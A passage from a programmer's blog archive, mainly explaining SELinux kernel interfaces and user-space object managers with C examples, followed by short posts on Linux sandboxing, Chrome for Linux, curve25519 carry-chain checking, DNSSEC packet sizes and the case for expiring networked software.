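  /* %x accepts an optional 0x prefix, so both spellings of the
   * second field parse. */
  const int n = sscanf(in, "%x %x %x %x %u %x", &allowed, &decided,
                       &audit_allow, &audit_deny, &seqno, &flags);
  if (n < 5) return -1;  /* the sixth (flags) field is optional here */
  r->allowed = allowed;
  r->decided = decided;
  r->audit_allow = audit_allow;
  r->audit_deny = audit_deny;
  r->seqno = seqno;
  r->flags = flags;
  return 0;
}
```

A real object manager would write the formatted query to /selinux/access and then read the reply back from the same file descriptor before parsing it.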

Attribute files

SELinux is also responsible for a number of attribute files in /proc. The attribute system is actually a generic LSM hook, although the names of the nodes are currently hardcoded into the code for the proc filesystem.

/proc/pid/attr/current

Contains the current security context for the process. Writing to this performs a dynamic transition to the new context. In order to do this:

  • The current security context must have PROCESS:DYNTRANSITION to the new context.
  • The process must be single threaded or the transition must be to a context bounded by the current context.
  • If the process is being traced, the tracer must have permissions to trace the new context.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETCURRENT)

/proc/pid/attr/exec

Sets the security context for child processes. The permissions checking is done at exec time rather than when writing this file.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETEXEC)

/proc/pid/attr/fscreate

Sets the security context for files created by the current process. The permissions checking is done at creat/open time rather than when writing this file.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETFSCREATE)

/proc/pid/attr/keycreate

Sets the security context for keys created by the current process. Keys support in the kernel is documented in Documentation/keys.txt. The permissions checking is done at creation time rather than when writing this file.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETKEYCREATE)

/proc/pid/attr/sockcreate

Sets the security context for sockets created by the current process. The permissions checking is done at creation time rather than when writing this file.

(Read: PROCESS:GETATTR. Write: only allowed for the current process and requires PROCESS:SETSOCKCREATE)

User-space object managers

Although the kernel is a large source of authority for many processes, it's certainly not the only one these days. An increasing amount of ambient authority is being granted via new services like DBus and then there's always the venerable old X server which, by default, allows clients to screenshot other windows, grab the keyboard input etc.

The most common example of a user-space process attempting to enforce a security policy is probably a SQL server. PostgreSQL and MySQL both have a login system and an internal user namespace, permissions database etc. This leads to administrators having to learn a whole separate security system, use password authentication over local sockets, include passwords embedded in CGI scripts etc.

User-space object managers are designed to solve this issue by allowing a single policy to express the allowed actions for objects which are managed outside the kernel. The NSA has published a number of papers about securing these types of systems: X: [1] [2], DBus: [1]. See also the SE-PostgreSQL project for details on PostgreSQL and Apache.

In order to implement such a design a user-space process needs to be able to label its objects, query the global policy and determine the security context of requests from clients. The libselinux library contains the canonical functions for doing all these things, but this document is about what lies under the hood, so we'll be doing it raw here.

The task of labeling objects is quite specific to each different object manager and this problem is discussed in the above referenced papers. Labels need to be stored (probably persistently) and administrators need some way to query and manipulate them. For example, in the X server, objects are often labeled with a type which derives from their name ("XInput" → "input_ext_t").

When it comes to querying the policy database, a process could either open the policy file from disk (which we'll cover later) or it could query the kernel. Querying the kernel solves a number of issues around locating the policy and invalidating caches when it gets reloaded, so that's the path which the SELinux folks have taken. See the section on /selinux/access for the interface for doing this.

In order to authenticate requests from clients, SELinux allows a process to get the security context of the other end of a local socket. There are efforts underway to extend this beyond the scope of a single computer, but I'm going to omit the details for brevity here.

I'll start with a code example of this authentication first:

  const int afd = socket(PF_UNIX, SOCK_STREAM, 0);
  assert(afd >= 0);

  struct sockaddr_un sun;
  memset(&sun, 0, sizeof(sun));
  sun.sun_family = AF_UNIX;
  strcpy(sun.sun_path, "test-socket");
  assert(bind(afd, (struct sockaddr*) &sun, sizeof(sun)) == 0);
  assert(listen(afd, 1) == 0);
  const int fd = accept(afd, NULL, NULL);
  assert(fd >= 0);

  char buf[256];
  socklen_t bufsize = sizeof(buf);
  assert(getsockopt(fd, SOL_SOCKET, SO_PEERSEC, buf, &bufsize) == 0);
  printf("%s\n", buf);

This code snippet will print the security context of any process which connects to it. Running it without any special configuration on a Fedora 11 system (targeted policy) will result in a context of unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023. Don't try running it on a socket pair, however: you end up with system_u:object_r:unlabeled_t:s0.

If you already have code which is using SCM_CREDENTIALS to authenticate peers, you can use getpidcon to get a security context from a PID. Under the hood this just reads /proc/pid/attr/current.
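To make the "under the hood" part concrete, here's a minimal sketch of reading a process's context straight from the attribute file in /proc. The helper names attr_current_path and read_pid_context are hypothetical and this is not how libselinux is actually structured. It just shows the file access involved.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/* Builds the attribute path for `pid`. Returns 0, or -1 if `out` is too small. */
static int attr_current_path(char *out, size_t outlen, pid_t pid) {
  assert(out != NULL);
  const int n = snprintf(out, outlen, "/proc/%ld/attr/current", (long)pid);
  return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Reads the security context of `pid` into `buf` as a NUL terminated string.
 * Returns the number of bytes read, or -1 on error. */
static ssize_t read_pid_context(pid_t pid, char *buf, size_t buflen) {
  char path[64];
  if (buflen == 0 || attr_current_path(path, sizeof(path), pid) != 0)
    return -1;

  FILE *f = fopen(path, "r");
  if (f == NULL) return -1;

  const size_t n = fread(buf, 1, buflen - 1, f);
  const int failed = ferror(f);
  fclose(f);
  if (failed) return -1;

  buf[n] = '\0';
  return (ssize_t)n;
}
```

On a system without SELinux the read will fail or return nothing, so callers should treat -1 and an empty string as "no context available".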

Now that we can label requests, the next part of the puzzle is getting access decisions from the kernel. As hinted at above, the /selinux/access file allows this. See above for the details of the transaction format. As an example, we'll see if the action PROCESS:GETATTR, with a subject and object of unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023, is permitted.

  → unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 2 00010000
  ← f77fffff ffffffff 0 fffafb7f 11

This is telling us that it is permitted (the only bits missing are for EXECHEAP and DYNTRANSITION). It also tells us the permissions which should be logged on allow and deny and the sequence number of the policy state in the kernel. Note that, above, we documented an additional flags field, however it's missing in this example. That's another good reason to use libselinux! The flags field was only recently added and isn't in the kernel which I'm using for these examples.
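Interpreting the reply is just bit twiddling. As a small sketch (the function names are mine, not libselinux's), this checks a requested permission bitmap against the allowed bitmap and computes which bits were denied:

```c
#include <assert.h>
#include <stdint.h>

/* Returns 1 if every bit in `requested` is also set in `allowed`. */
static int access_permitted(uint32_t allowed, uint32_t requested) {
  return (allowed & requested) == requested;
}

/* Returns the permission bits which are missing from `allowed`. */
static uint32_t denied_bits(uint32_t allowed) {
  return ~allowed;
}
```

With the example above, access_permitted(0xf77fffff, 0x00010000) is true and denied_bits(0xf77fffff) is 0x08800000, which are the two bits that the text attributes to EXECHEAP and DYNTRANSITION.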

At this point, the astute reader will be worried about the performance impact of getting this information from the kernel in such a manner. The solution is to use the same access vector cache code that the kernel uses, in user-space, to cache the answers from the kernel. This is another benefit which libselinux brings.

However, every cache brings with it problems of consistency and this is no different. All user-space object managers need to know when the administrator updates the system security policy so that they can flush their AVCs. This notification is achieved via a netlink socket, as demonstrated by the following snippet:

  const int fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_SELINUX);
  assert(fd >= 0);

  struct sockaddr_nl addr;
  int len = sizeof(addr);
  memset(&addr, 0, len);
  addr.nl_family = AF_NETLINK;
  addr.nl_groups = SELNL_GRP_AVC;
  assert(bind(fd, (struct sockaddr*) &addr, len) == 0);

  struct sockaddr_nl nladdr;
  socklen_t nladdrlen;
  char buf[1024];
  struct nlmsghdr *nlh = (struct nlmsghdr *)buf;

  for (;;) {
    nladdrlen = sizeof(nladdr);
    const ssize_t r = recvfrom(fd, buf, sizeof(buf), 0,
                               (struct sockaddr*) &nladdr, &nladdrlen);
    assert(r >= 0);
    assert(nladdrlen == sizeof(nladdr));
    assert(nladdr.nl_pid == 0);
    assert((nlh->nlmsg_flags & MSG_TRUNC) == 0);
    assert(nlh->nlmsg_len <= r);

    if (nlh->nlmsg_type == SELNL_MSG_SETENFORCE) {
      struct selnl_msg_setenforce *msg = NLMSG_DATA(nlh);
      printf("enforcing %s\n", msg->val ? "on" : "off");
    } else if (nlh->nlmsg_type == SELNL_MSG_POLICYLOAD) {
      struct selnl_msg_policyload *msg = NLMSG_DATA(nlh);
      printf("policy loaded, seqno:%u\n", msg->seqno);
    }
  }

If you toggle the enforcing mode off and on, or reload the system policy (with `semodule -R`), a message is delivered via the netlink socket. A user-space object manager can then flush its AVC etc.
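To illustrate the caching and flushing described above, here's a deliberately tiny, direct-mapped cache of access decisions. This is only a sketch under my own assumptions: the struct and function names are hypothetical, contexts are represented by made-up numeric IDs, and the real AVC in libselinux is considerably more elaborate.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define AVC_SLOTS 64

struct avc_entry {
  int valid;
  uint32_t ssid, tsid;  /* hypothetical numeric IDs for the two contexts */
  uint16_t tclass;
  uint32_t allowed;     /* allowed bitmap as returned by the kernel */
};

struct avc_cache {
  struct avc_entry slots[AVC_SLOTS];
  uint32_t seqno;       /* policy sequence number the entries belong to */
};

static unsigned avc_slot(uint32_t ssid, uint32_t tsid, uint16_t tclass) {
  return (ssid ^ (tsid << 2) ^ ((uint32_t)tclass << 4)) % AVC_SLOTS;
}

/* Remembers a decision, evicting whatever previously lived in the slot. */
static void avc_insert(struct avc_cache *c, uint32_t ssid, uint32_t tsid,
                       uint16_t tclass, uint32_t allowed) {
  assert(c != NULL);
  struct avc_entry *e = &c->slots[avc_slot(ssid, tsid, tclass)];
  e->valid = 1;
  e->ssid = ssid;
  e->tsid = tsid;
  e->tclass = tclass;
  e->allowed = allowed;
}

/* Returns 1 and fills `allowed` on a hit, 0 on a miss. */
static int avc_lookup(const struct avc_cache *c, uint32_t ssid, uint32_t tsid,
                      uint16_t tclass, uint32_t *allowed) {
  const struct avc_entry *e = &c->slots[avc_slot(ssid, tsid, tclass)];
  if (!e->valid || e->ssid != ssid || e->tsid != tsid || e->tclass != tclass)
    return 0;
  *allowed = e->allowed;
  return 1;
}

/* Call when a policy load notification arrives: every cached answer may
 * now be stale, so throw them all away and record the new sequence number. */
static void avc_on_policyload(struct avc_cache *c, uint32_t seqno) {
  memset(c->slots, 0, sizeof(c->slots));
  c->seqno = seqno;
}
```

On a miss the object manager would query /selinux/access and insert the answer. In the netlink loop, the SELNL_MSG_POLICYLOAD branch is where something like avc_on_policyload(&cache, msg->seqno) would go.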

With all the above, hopefully it's now clear how user-space object managers work. If you wish to write your own, remember to read the libselinux man pages first.

Reading binary policy files

The system security policy is written in a text-based language which has been well documented elsewhere. These text files are compiled and checked by user-space tools and converted into a binary blob that can be loaded into the kernel. The binary blob is also saved on disk and can be a useful source for information.

The SELinux user-space tools contain libsepol which is very useful for parsing these files. Here's a snippet of example code which returns the number of users, roles and types defined in a policy file:

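#include <stdio.h>

#include <sepol/policydb.h>
#include <sepol/policydb/policydb.h>

int main(int argc, char **argv) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <binary policy file>\n", argv[0]);
    return 1;
  }

  FILE* file = fopen(argv[1], "r");
  if (file == NULL) {
    perror("fopen");
    return 1;
  }

  sepol_policy_file_t* input;
  sepol_policy_file_create(&input);
  sepol_policy_file_set_fp(input, file);

  sepol_policydb_t* policy;
  sepol_policydb_create(&policy);
  if (sepol_policydb_read(policy, input) != 0) {
    fprintf(stderr, "failed to read policy\n");
    return 1;
  }

  /* nprim is the number of primary names in each symbol table. */
  printf("users:%u roles:%u types:%u\n",
         policy->p.p_users.nprim,
         policy->p.p_roles.nprim,
         policy->p.p_types.nprim);

  return 0;
}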

By looking in the sepol/policydb/policydb.h header, you can probably find whatever you are looking for. Pay special heed to the comments about indexing however. Users, roles and types are indexed from 1 in some places and from 0 in others.

With a little C code, much of the useful information can be extracted from the policy files. The numbers and graphs above were generated this way, with a little help from a few Python scripts.

Conclusion

Hopefully we've covered some useful areas of SELinux that some people were unfamiliar with before, or at least shown the inner workings of something which you already knew about.

If you want information about the practical aspects of administering a system with SELinux, you should start with the Fedora documentation on the subject. After reading this document I hope that some of it is clearer now.

General homomorphic encryption

If you've heard of Hal Finney, the following quote should be enough to get you to read his explanation of the recent homomorphic encryption paper:

This is IMO one of the most remarkable crypto papers ever. Not only does it solve one of the oldest open problems in cryptography, the construction of a fully homomorphic encryption system, it does so by means of a self-embedding technique reminiscent of Godel's theorem.

Linux sandboxing with LSMSB

Chrome Linux got a dev channel release and I'm very happy with it. It's now my primary browser.

However, one of the big selling points for Chrome on Windows is that the renderers (which deal with decoding the HTML, CSS, image files etc) are sandboxed. We've had exploitable issues in the renderers which have been stopped by the sandbox. It's a Good Thing.

However, we don't have a sandbox on Linux! The Mac team have been talking about how nice their sandbox is (and I expect we'll get some official documentation about it after WWDC this week). We have to hack around with SUID binaries, chrooting, seccomp and one-size-fits-all SELinux solutions.

(I don't wish to discount the good work that the SELinux folks have done: we'll probably use something like that sandbox on Fedora, but Chromium was very carefully written to be sandboxed and we should aim higher.)

So, as part of the exploration of what we could do with sandboxing on Linux, longer term, I have a prototype implementation of LSMSB. It's another literate program of mine, so you can usefully read the source too. The README is included below:

This is LSMSB, a sandboxing scheme for Linux based on the ideas of the OS X
sandbox (which, in turn, was inspired by TrustedBSD and FreeBSD).

Imagine that you're working on a university computer and you get a binary which
promises to do some fiendishly complex calculation, reading from a file ./input
and writing to a file ./output. It also talks to a specific server to access a
pre-computed lookup table. You want to run it, but you don't want to have to
trust that it won't do anything malicious (save giving the wrong answer).

This code is incomplete, but currently you can take a sandbox specification
like this:

filter dentry-open {
  constants {
    var etc-prefix bytestring = "/etc/";
  }

  ldc r2,etc-prefix;
  isprefixof r2,r2,r0;
  jc r2,#fail;
  ldi r0,1;
  ret r0;
#fail:
  ldi r0,0;
  ret r0;
}

... and use it to remove access to /etc.

*** This code functions, but is incomplete ***

It's written in a literate programming style, but the derived sources are
included so that you don't have to bother with that in order to build. You'll
need a recent (> 2.6.30-rc1) kernel in order to apply the included patch. Once
you've applied the patch, drop lsmsb.c into security/lsmsb and rebuild.

You can assemble a sandbox file with:
  ./lsmsb-as sandbox-input.sb > sandbox
And then run a shell in the sandbox with:
  ./lsmsb-install sandbox

To read the code, see http://www.imperialviolet.org/binary/lsmsb.html

Chrome for Linux

The rest of the Chrome Linux team and I have been working hard over the past few months to get Chrome ported to Linux. It's certainly very rough still, but it runs and the first development release has just gone out.

I'm very happy with this and we should be pushing new releases frequently from now on. If you're in the San Francisco office tomorrow, feel free to pop by the office as I'll be bringing in champagne.

Just to be clear, here are some of the things which don't work:

  • Plugins (so, no Flash)
  • Complex text (this is my TODO, I just got distracted)
  • Printing
  • Much of the options UI!

W2SP and Seccomp

I gave a talk today at W2SP about opportunistic encryption. You would have to ask someone in the audience how it went to get a real answer, but I feel it went OK.

The talk was based on a paper that I wrote for the conference.

Also, LWN covered some recent work that I've been doing at Google with Linux sandboxing.

Moved to GitHub

I've finally managed to move IV off heeps, a server which it's been ticking along on for the last half decade.

In the process, I've moved to GitHub using their Pages system. We'll see how well it works out!

In the process I've cleaned out a lot of stuff and probably broken lots of links. I trust that the search engines will figure it all out soon enough.

I'll be at CodeCon this y...

I'll be at CodeCon this year.

Thanks to Alexander Sotir...

Thanks to Alexander Sotirov for pushing me to check that the carry chains in donna-c64 were sufficient. I don't know if I realised something when I wrote it which I'm currently missing, or if I just screwed up, but I now believe that they're wrong.

I wrote this Haskell code to check it:

This Haskell code has been written to experiment with the carry chains in
curve25519-donna-c64. It's a literate Haskell program, one can load it into
GHCI and play along.

> module Main where
>
> import Data.Bits (shiftR, (.&.))

There are two constants that we'll need.

Our five limbs are, nominally, 51 bits wide, so this is the maximum value of
their initial values.

> twoFiftyOneMinusOne = (2 ^ 51) - 1

2^128 - 1 is the limit of the range of our temporary variables. If we exceed
this at any point, our calculations will be incorrect.

> two128MinusOne = (2 ^ 128) - 1

Now we define a type which mimics our 128-bit unsigned type in C. It's a
disjunction of an Integer and the distinguished value 'Overflow'. 'Overflow' is
contagious: if we try to perform any operations where one or both of the
operands is 'Overflow', then the result is also 'Overflow'.

> data U128 = U128 Integer
>           | Overflow
>           deriving (Show, Eq)

We make U128 an instance of Num so that we can perform arithmetic with it.

> instance Num U128 where
>   (U128 a) + (U128 b) = mayOverflow (a + b)
>   _ + _ = Overflow
>   (U128 a) * (U128 b) = mayOverflow (a * b)
>   _ * _ = Overflow
>   (U128 a) - (U128 b) = mayOverflow (a - b)
>   _ - _ = Overflow
>   negate _ = Overflow
>   abs a@(U128 _) = a
>   abs _ = Overflow
>   signum (U128 _) = 1
>   signum _ = 0
>   fromInteger = mayOverflow

> instance Ord U128 where
>   compare (U128 a) (U128 b) = compare a b
>   compare _ _ = EQ

This function lifts an Integer to a U128. If the value is out of range, the
result is 'Overflow'.

> mayOverflow :: Integer -> U128
> mayOverflow x
>   | x > two128MinusOne = Overflow
>   | x < 0 = Overflow
>   | otherwise = U128 x

Our field elements consist of five limbs. In the C code, these limbs are
actually uint64_t's, but we keep them as U128's here. We will convince ourselves
that we don't hit any 64-bit overflows later.

> data FieldElement = FieldElement { m0 :: U128, m1 :: U128, m2 :: U128,
>                                    m3 :: U128, m4 :: U128 }
>                                  deriving (Show, Eq)

Now, two helper functions:

This function takes only the bottom 51-bits of a value

> clamp :: U128 -> U128
> clamp (U128 a) = U128 $ a .&. 0x7ffffffffffff
> clamp _ = Overflow

This function drops the bottom 51-bits of a value

> topBits :: U128 -> U128
> topBits (U128 a) = U128 $ a `shiftR` 51
> topBits _ = Overflow

This function simulates the 'fsquare' function in donna-c64, including its carry
chain. If the carry chain is sufficient, then iterating this function for any
valid initial value should never overflow.

> square :: FieldElement -> FieldElement
> square e = result where
>   t0 = m0 e * m0 e
>   t1 = m0 e * m1 e +
>        m1 e * m0 e
>   t2 = m0 e * m2 e +
>        m2 e * m0 e +
>        m1 e * m1 e
>   t3 = m0 e * m3 e +
>        m3 e * m0 e +
>        m1 e * m2 e +
>        m2 e * m1 e
>   t4 = m0 e * m4 e +
>        m4 e * m0 e +
>        m3 e * m1 e +
>        m1 e * m3 e +
>        m2 e * m2 e
>   t5 = m4 e * m1 e +
>        m1 e * m4 e +
>        m2 e * m3 e +
>        m3 e * m2 e
>   t6 = m4 e * m2 e +
>        m2 e * m4 e +
>        m3 e * m3 e
>   t7 = m3 e * m4 e +
>        m4 e * m3 e
>   t8 = m4 e * m4 e
>
>   t0' = t0 + t5 * 19
>   t1' = t1 + t6 * 19
>   t2' = t2 + t7 * 19
>   t3' = t3 + t8 * 19
>
>   t1'' = t1' + topBits t0'
>   t2'' = t2' + topBits t1''
>   t3'' = t3' + topBits t2''
>   t4' = t4 + topBits t3''
>   t0'' = t0' + 19 * topBits t4'
>   t1''' = clamp t1'' + topBits t0''

At this point, we implement two carry chains. If 'currentChain' is true, then we
implement the carry chain as currently written in donna-c64. Otherwise, we
perform an extra step and carry t1 into t2.

>   result = if currentChain
>               then FieldElement (clamp t0'') t1''' (clamp t2'') (clamp t3'')
>                                 (clamp t4')
>               else FieldElement (clamp t0'') (clamp t1''') t2''' (clamp t3'')
>                                 (clamp t4') where
>                    t2''' = clamp t2'' + topBits t1'''

This is the maximum initial element: an element where all limbs are 2^51 - 1.
Inspection of the 'fexpand' function should be sufficient to convince oneself of
this.

> maxInitialElement :: FieldElement
> maxInitialElement = FieldElement twoFiftyOneMinusOne twoFiftyOneMinusOne
>                                  twoFiftyOneMinusOne twoFiftyOneMinusOne
>                                  twoFiftyOneMinusOne

This function takes two field elements and returns the worst case result: one
where the maximum of each limb is chosen.

> elementWiseMax :: FieldElement -> FieldElement -> FieldElement
> elementWiseMax x y = FieldElement (f m0) (f m1) (f m2) (f m3) (f m4) where
>   f :: (FieldElement -> U128) -> U128
>   f accessor = max (accessor x) (accessor y)

We now define a series of values generated by squaring the previous element and
setting any limb that is less than the maximum to the maximum value.

> maxSeries = iterate (elementWiseMax maxInitialElement . square)
>                     maxInitialElement

This value controls which carry chain is used in 'square', the current one or
the one with the extra carry

> currentChain = True

By running this, we can see that the current carry chain is insufficient for
this simulation:

ghci> maxSeries !! 4
FieldElement {m0 = Overflow, m1 = Overflow, m2 = Overflow, m3 = Overflow,
              m4 = Overflow}

The series overflows after only four iterations. However, if we use the
alternative carry chain, the series is stable far beyond the requirements of
the Montgomery ladder used in donna-c64:

ghci> maxSeries !! 100000
FieldElement {m0 = U128 2251799813685247, m1 = U128 2251799813685247,
              m2 = U128 2251799813685247, m3 = U128 2251799813685247,
              m4 = U128 2251799813685247}

Additionally, these values are small enough not to overflow the 64-bit limbs.

When I wrote curve25519-d...

When I wrote curve25519-donna I implemented many of the critical functions in x86-64 assembly. It was a lot of code, even using the C preprocessor! This got a good 20% boost in speed. This was clearly very important because it made donna-x86-64 faster than djb's version.

However, djb just pointed out that the 64-bit C implementation of donna was now as fast as my hand coded version. Turns out that GCC 4.3 greatly improved the quality of the code generation for this sort of code and now equals my hand crafted efforts! Well done to the GCC team because the C code is vastly smaller and easier to understand. Thus, the x86-64 assembly version of donna has been removed from the repo.

Packet sizes in DNSSEC

Even when the DNS root hasn't started signing records, one can still use trust-anchors to employ DNSSEC for those TLDs which support it. Follow the links from Ben Laurie's latest blog post on the matter.

The .se ccTLD is one of those TLDs which support DNSSEC. You can test it with: dig +dnssec -t any se @a.ns.se. You'll see lots of NSEC, RRSIG and DNSKEY records. (DNSSEC is very complicated.)

However, that reply is 3974 bytes long! All that from a request packet of 31 bytes. That's a very easy to use 100x DoS amplification. Of course, if you use mirror amplification like that, you cannot forge the source addresses of the flooding packets, making the flood easier to filter. However, DNSSEC may well bring DoS floods into the reach of many more attackers.

When Layers of Abstractio...

When Layers of Abstraction Don't Get Along: The Difficulty of Fixing Cache Side-Channel Vulnerabilities.

Why networked software should expire.

If your business is still writing letters in WordStar and printing them out on an original Apple Laserwriter, good for you. If you're writing your own LISP in vi on a PDP 10, best of luck. However, if you're still using IE6, that's just rude.

Networked software (by which I just mean programs that talk to other programs) on public networks have a different cost model than the first two examples, but our mental models haven't caught up with that fact yet. We're stuck with the idea that what software you run is your own business and that's preventing needed changes. Here's one example:

ECN (Explicit Congestion Notification) is a modification to TCP and IP which allows routers to indicate congestion by altering packets as they pass through. Early routers dropped packets only when their buffers overflowed and this was taken as an indication of congestion. It was soon noticed that a more probabilistic method of indicating congestion performed better. So routers started using RED (random early drop) where, approximately, if a buffer is 50% full, a packet has a 50% chance of getting dropped. This gives an indication of congestion sooner and prevents cases where TCP timeouts for many different hosts would start to synchronise and resonate.
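The approximate rule above ("50% full means a 50% chance of a drop") can be written down in a few lines. This is only a sketch of that simplified model, with function names of my own choosing. Real RED implementations work from a smoothed average queue length with minimum and maximum thresholds, which is not modelled here.

```c
#include <assert.h>

/* Drop probability under the simplified model: equal to the fraction of
 * the buffer that is currently in use. A full buffer always drops. */
static double red_drop_probability(unsigned queued, unsigned capacity) {
  if (capacity == 0 || queued >= capacity) return 1.0;
  return (double)queued / (double)capacity;
}

/* Decides the fate of one arriving packet. `sample` is a uniform random
 * number in [0, 1) which the caller supplies. */
static int red_should_drop(unsigned queued, unsigned capacity, double sample) {
  return sample < red_drop_probability(queued, capacity);
}
```

An ECN capable router would use the same decision, but mark the packet where this sketch says "drop".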

To indicate congestion, RED drops a packet that has already traversed part of the network; throwing away information. So ECN was developed to indicate congestion without dropping the packets. Network simulations and small scale testing showed a small, but significant benefit from it.

But when ECN was enabled for vger.kernel.org, the mailing list server which handles Linux kernel mailing lists, many people suddenly noticed that their mails weren't getting through. It turned out that many buggy routers and firewalls simply dropped all packets which were using ECN. This was clearly against the specifications and, in terms of code, an easy fix.

ECN wasn't enabled by default in order to give time for the routers to get fixed. In a year or so, it was hoped, it could start to be used and the Internet could start to benefit.

That was over eight years ago now. ECN is still not enabled by default in any major OS. The latest numbers I've seen (which I collected) suggest that 0.5% of destinations will still stop working if you enable ECN and the number of hosts supporting ECN appears to be dropping.

The world has paid a price for not having ECN for the past eight years. Not a lot, but downloads have been a little slower and maybe more infrastructure has been built than was really needed. But who actually paid? Every user of the Internet did, a little bit. But that cost was imposed by router manufacturers who didn't test their products and network operators who didn't install updates. Those people saved money by doing less and everyone else paid the price.

These problems are multiplying with the increasing amount of network middleware (routers, firewalls etc) getting deployed; often in homes and owned by people who don't know or care about them.

Recently, Linux 2.6.27 was released and broke Internet access for, probably, thousands of people. Ubuntu Intrepid released with it and had to disable TCP timestamps as a work around while the issue was fixed.

But the issue wasn't a bug in 2.6.27. It was a bug in many home routers (WiFi access points and the like) which was triggered by a perfectly innocent change in Linux that caused the order of TCP options to change. (I felt specifically aggrieved about this because I made that change.) The order was soon changed back and everything started working again.

But, for the future, this now means that the order cannot change. It's not written down anywhere, it's a rule written in bugs. This imposes costs on anyone who might write new TCP stacks in the future, by requiring increased testing and reduced sales as some customers find that it won't work with their routers. These are all costs created by router manufacturers and paid by others.

Economists call these sorts of costs externalities and they are seen as a failure which needs to be addressed. Often, in other areas, they are addressed by regulation or privatisation. Neither of those options appeals in this case.

An uncontroversial suggestion that I'm going to make is that we require better test suites. As a router manufacturer, testing involves checking that your equipment works with a couple of flavors of Windows and, if we're lucky, Linux and some BSDs too. This is much too small of a testing surface. There needs to be an open source test suite designed to test every corner of the RFCs. The NFS connectathons are similar in spirit and probably saved millions of man-hours of debugging over their lifetimes. Likewise, the ACID tests for web browsers focused attention on areas where they were poorly implementing the standards.

And, although my two examples above are both IP/TCP related, I don't want to suggest that the problem stops there. Every common RFC should have such a test suite. HTTP may be a simple protocol but I'll bet that most implementations can't cope with continued header lines. It's those corners which a test suite should address.
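For anyone who hasn't met continued header lines: the HTTP/1.1 specification of the time (RFC 2616) lets a header value run onto following lines as long as each extra line starts with a space or tab. A conforming parser has to join those lines back up. Here's a minimal sketch of that unfolding step. The function name and interface are mine, and a real parser would do this as part of header parsing rather than as a separate pass.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copies `in` to `out`, replacing every line break which is followed by a
 * space or tab (a continuation) with a single space. Returns the length of
 * the result, or (size_t)-1 if `out` is too small. */
static size_t unfold_headers(const char *in, char *out, size_t outlen) {
  size_t o = 0;
  for (size_t i = 0; in[i] != '\0';) {
    /* Length of the line break at position i: 2 for CRLF, 1 for bare LF. */
    size_t brk = 0;
    if (in[i] == '\r' && in[i + 1] == '\n') {
      brk = 2;
    } else if (in[i] == '\n') {
      brk = 1;
    }

    char c;
    if (brk != 0 && (in[i + brk] == ' ' || in[i + brk] == '\t')) {
      /* Continuation: swallow the break and the leading whitespace. */
      i += brk;
      while (in[i] == ' ' || in[i] == '\t') i++;
      c = ' ';
    } else {
      c = in[i++];
    }

    if (o + 1 >= outlen) return (size_t)-1;  /* keep room for the NUL */
    out[o++] = c;
  }
  if (outlen == 0) return (size_t)-1;
  out[o] = '\0';
  return o;
}
```

Given "X-Long: first\r\n second\r\nHost: a\r\n", this produces "X-Long: first second\r\nHost: a\r\n". A test suite would feed inputs like the former to an implementation and check that it behaves as if it had received the latter.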

Testing should help, but I don't think that it'll be enough. Problems will slip through. Testing against specifications will also never catch problems with the specification itself.

DNS requests can carry multiple questions. There's a big counter in the packet to say how many questions you are asking. However, the reply format can only hold one response code. Thus, I don't know of any DNS server which handles multiple questions (most consider the request to be invalid).
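The mismatch is visible in the fixed, 12-byte DNS header from RFC 1035: the question count is a 16-bit field at bytes 4 and 5, while the response code is a single 4-bit field in the low nibble of byte 3. A small sketch of pulling both out of a packet (the function names are hypothetical):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define DNS_HEADER_LEN 12

/* Extracts QDCOUNT, the number of questions. Returns 0, or -1 if short. */
static int dns_qdcount(const uint8_t *pkt, size_t len, uint16_t *out) {
  if (len < DNS_HEADER_LEN) return -1;
  *out = (uint16_t)((pkt[4] << 8) | pkt[5]);
  return 0;
}

/* Extracts RCODE, the one and only response code. Returns 0, or -1 if short. */
static int dns_rcode(const uint8_t *pkt, size_t len, uint8_t *out) {
  if (len < DNS_HEADER_LEN) return -1;
  *out = pkt[3] & 0x0f;
  return 0;
}
```

A reply with QDCOUNT of 2 still has only one RCODE, so there's no way to say "the first name exists but the second doesn't".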

The ability to ask multiple questions would be very helpful. Just look at the number of places which suggest that you turn off IPv6 to make your networking faster. That's because software will otherwise ask a single IPv6 question of DNS, wait for the reply and then ask the IPv4 question. This delay, caused by not being able to request both results in a single request, is causing people to report slowdowns and disable IPv6.

We need to fix DNS, but we never can because one cannot afford to break the world. We can't even start a backwards compatible transition because of broken implementations.

That's why networked software should have an expiry date. After the expiry date, the code should make it very clear that it's time to upgrade. For a router, print a big banner when an administrator connects. Flash all the error lights. For software, pop up a dialog every time you start. For home routers, beep and flash a big indicator.

We don't need everyone to update and, as manufacturers fold, maybe there won't be any firmware updates or software upgrades. Almost certainly the device shouldn't stop working. But we need to make more of an effort to recognise that large populations of old code hold everyone else back.

If we can know that nearly all the old code is going to be gone by some date, maybe we can make progress.

(Thanks to Evan for first putting this idea in my mind.)

rwb0fuz1024 included in eBATS

rwb0fuz1024 (pronounced 'robo-fuzz') has been included in the eBATS benchmarking suite. Not all of the test systems have been run with it yet, but here's one which has. It's the fastest verification by far.

(Full results here)

Sandboxing on Linux

This blog post has been brought about because of the issues of sandboxing Chromium on Linux (no, it's not ready and won't be for months).

Chromium uses a multiprocess model where each tab (roughly) is a separate process which performs IPCs to a UI process. This means that we can do parallel rendering and withstand crashes in the renderer. It also means that we should be able to sandbox the renderers.

Since the renderers are parsing HTML, CSS, Javascript, running plugins etc, sandboxing them would be very desirable. There's a lot of scope for buffer overflows and other issues in a code base that large and a good sandbox would dramatically reduce the scope of any exploits.

Traditional sandboxes: chroot, resource limits

